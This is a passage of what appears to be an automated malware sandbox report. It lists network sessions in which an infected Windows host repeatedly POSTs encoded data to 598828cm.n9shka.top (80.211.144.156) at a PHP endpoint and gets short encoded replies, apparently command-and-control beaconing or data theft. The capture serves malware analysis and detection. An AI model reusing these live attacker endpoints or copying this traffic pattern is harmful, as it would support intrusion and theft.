                                                    85192.168.2.46285180.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:23.999856949 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:24.353168964 CEST1012OUTData Raw: 56 54 59 5d 54 43 5a 5f 5e 5e 56 51 56 5c 54 59 57 56 5c 5f 57 5d 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTY]TCZ_^^VQV\TYWV\_W]UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+?5[&-%5*=6?0$(2:'X<_/Q':>739[,,&F/%Z-
                                                    Sep 14, 2024 12:54:24.675563097 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:24.806042910 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    86192.168.2.46285280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:24.937675953 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:25.290755987 CEST1012OUTData Raw: 56 5e 59 5e 51 41 5a 5c 5e 5e 56 51 56 59 54 5f 57 5e 5c 5d 57 5b 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^Y^QAZ\^^VQVYT_W^\]W[U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+9_'.>S!$4Y>5"0$+?'*'<:7&\)]#0=X,&F/%Z-!
                                                    Sep 14, 2024 12:54:25.612818956 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:25.812776089 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    87192.168.2.46285380.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:25.940253019 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:26.290714025 CEST1012OUTData Raw: 56 51 5c 5b 54 45 5f 5c 5e 5e 56 51 56 5e 54 5d 57 52 5c 58 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQ\[TE_\^^VQV^T]WR\XWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<:3.>"4$]*=6!Y8'+'%)7^?)+1*4#),,&F/%Z-=
                                                    Sep 14, 2024 12:54:26.603148937 CEST1012OUTData Raw: 56 51 5c 5b 54 45 5f 5c 5e 5e 56 51 56 5e 54 5d 57 52 5c 58 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQ\[TE_\^^VQV^T]WR\XWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<:3.>"4$]*=6!Y8'+'%)7^?)+1*4#),,&F/%Z-=
                                                    Sep 14, 2024 12:54:27.032875061 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:27.033087015 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:27.306291103 CEST1012OUTData Raw: 56 51 5c 5b 54 45 5f 5c 5e 5e 56 51 56 5e 54 5d 57 52 5c 58 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQ\[TE_\^^VQV^T]WR\XWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<:3.>"4$]*=6!Y8'+'%)7^?)+1*4#),,&F/%Z-=
                                                    Sep 14, 2024 12:54:28.073745966 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:28.073775053 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:28.355649948 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    88192.168.2.46285480.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:28.490564108 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:28.837563038 CEST1012OUTData Raw: 56 53 5c 59 51 41 5a 5f 5e 5e 56 51 56 5f 54 59 57 52 5c 5a 57 5f 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VS\YQAZ_^^VQV_TYWR\ZW_UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?)Z'*"4<]>2\5]$(]190<:3%\5X U";<&F/%Z-9


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    89192.168.2.46285580.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:29.017883062 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:29.369018078 CEST1748OUTData Raw: 56 52 59 5d 54 45 5f 58 5e 5e 56 51 56 5e 54 5a 57 50 5c 55 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VRY]TE_X^^VQV^TZWP\UW]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\?,-X'&57=."^"<;%((X19?+3'*#32,&F/%Z-=
                                                    Sep 14, 2024 12:54:29.681368113 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:29.808490038 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 1a 28 34 23 01 20 3a 2b 08 3c 3f 35 06 29 1c 3e 5f 2a 3c 0a 02 28 37 21 5c 2b 2d 20 08 24 2c 30 5a 30 31 26 06 27 27 27 1a 21 2b 2e 5a 0c 1d 23 5a 20 30 36 10 24 28 3e 12 24 0f 32 1a 20 54 24 01 32 05 21 59 21 01 3d 02 3c 16 2a 0f 3e 31 25 10 29 5b 3a 44 38 3d 36 51 34 02 23 51 00 10 26 55 24 2d 26 04 21 19 3a 0c 3d 0f 3e 05 24 25 31 09 27 05 35 01 24 38 3e 05 30 23 3c 03 20 22 3f 12 27 2c 23 1a 34 1d 0c 0b 29 2e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #(4# :+<?5)>_*<(7!\+- $,0Z01&'''!+.Z#Z 06$(>$2 T$2!Y!=<*>1%)[:D8=6Q4#Q&U$-&!:=>$%1'5$8>0#< "?',#4).#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    90192.168.2.46285680.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:29.158464909 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:29.509507895 CEST1012OUTData Raw: 56 5f 59 5c 51 46 5a 5d 5e 5e 56 51 56 53 54 5b 57 57 5c 5a 57 50 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V_Y\QFZ]^^VQVST[WW\ZWPUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(=$"W"'3>>56?$'<%Z+?%*"#9[;&F/%Z-
                                                    Sep 14, 2024 12:54:29.831511974 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:29.962171078 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    91192.168.2.46285780.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:30.127327919 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:30.478286028 CEST1012OUTData Raw: 53 52 5c 5c 51 44 5a 5e 5e 5e 56 51 56 52 54 59 57 5e 5c 5e 57 59 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SR\\QDZ^^^VQVRTYW^\^WYUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?/&3=!Z>57$(%\#(+&:&4#,<&F/%Z-
                                                    Sep 14, 2024 12:54:30.800896883 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:30.930233002 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    92192.168.2.46285880.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:31.059005022 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:31.415654898 CEST1008OUTData Raw: 56 51 59 54 54 43 5a 5a 5e 5e 56 51 56 5b 54 5f 57 50 5c 5b 57 58 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQYTTCZZ^^VQV[T_WP\[WXU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,Z&.&U"Q;)#?+3,_%?( 2):7U>;&F/%Z-9
                                                    Sep 14, 2024 12:54:31.730587959 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:31.860414982 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    93192.168.2.46285980.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:32.001293898 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:32.353195906 CEST1012OUTData Raw: 53 52 59 55 54 40 5f 59 5e 5e 56 51 56 5f 54 5e 57 53 5c 5e 57 51 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SRYUT@_Y^^VQV_T^WS\^WQU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?=3>T"8>=53'(''*3[+''*)]!3";&F/%Z-9
                                                    Sep 14, 2024 12:54:32.686450958 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:32.881419897 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    94192.168.2.46286080.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:33.013256073 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:33.368829966 CEST1012OUTData Raw: 53 55 59 58 54 41 5a 5d 5e 5e 56 51 56 5f 54 5f 57 54 5c 5a 57 5c 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SUYXTAZ]^^VQV_T_WT\ZW\U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<6$=&V"'?)[)"?(Z'^(]297_?9?%9" !Z8&F/%Z-9
                                                    Sep 14, 2024 12:54:33.706499100 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:33.842020035 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    95192.168.2.46286280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:34.936907053 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1724
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:35.290688038 CEST1724OUTData Raw: 56 57 59 5c 54 41 5a 59 5e 5e 56 51 56 5d 54 58 57 54 5c 58 57 5a 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VWY\TAZY^^VQV]TXWT\XWZU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y(<X&>U!8*[=5X'^$X%(?V2&#.<&F/%Z-1
                                                    Sep 14, 2024 12:54:35.601670027 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:35.728421926 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 20 04 2a 42 20 5f 23 04 30 55 2a 2f 0c 5a 2a 1c 39 04 29 3c 05 5a 2a 1a 1b 5d 2a 03 0e 08 24 12 30 5c 27 1f 21 58 27 37 27 56 21 3b 2e 5a 0c 1d 20 01 21 23 00 10 32 06 2e 5f 33 57 2e 1a 37 32 28 07 31 38 2e 03 36 2f 22 10 3f 5e 3e 08 3d 32 31 52 28 2d 2e 08 2f 2d 36 53 34 02 23 51 00 10 26 53 26 10 3d 1e 22 37 3d 1c 3d 0f 29 5d 31 1c 31 0d 24 15 3d 01 32 38 00 00 24 20 20 02 20 22 23 5b 27 02 09 59 23 23 29 52 28 3e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: *B _#0U*/Z*9)<Z*]*$0\'!X'7'V!;.Z !#2._3W.72(18.6/"?^>=21R(-./-6S4#Q&S&="7==)]11$=28$ "#['Y##)R(>#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    96192.168.2.46286380.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:35.082549095 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:35.431312084 CEST1012OUTData Raw: 56 56 5c 5b 54 43 5a 5a 5e 5e 56 51 56 52 54 59 57 55 5c 5a 57 5b 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VV\[TCZZ^^VQVRTYWU\ZW[UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+<53-&R"Q$X*[."$#&'()+&:7U!X.<&F/%Z-
                                                    Sep 14, 2024 12:54:35.764415979 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:36.170259953 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:54:36.171205044 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    97192.168.2.46286480.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:36.301388979 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:36.650084972 CEST1008OUTData Raw: 56 57 59 55 51 45 5f 59 5e 5e 56 51 56 5b 54 52 57 57 5c 59 57 5e 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VWYUQE_Y^^VQV[TRWW\YW^UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+Z&0.T#'0]>="?<[$88^23(*7&-X 3&8&F/%Z-
                                                    Sep 14, 2024 12:54:36.966149092 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:37.161189079 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    98192.168.2.46286580.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:37.303347111 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
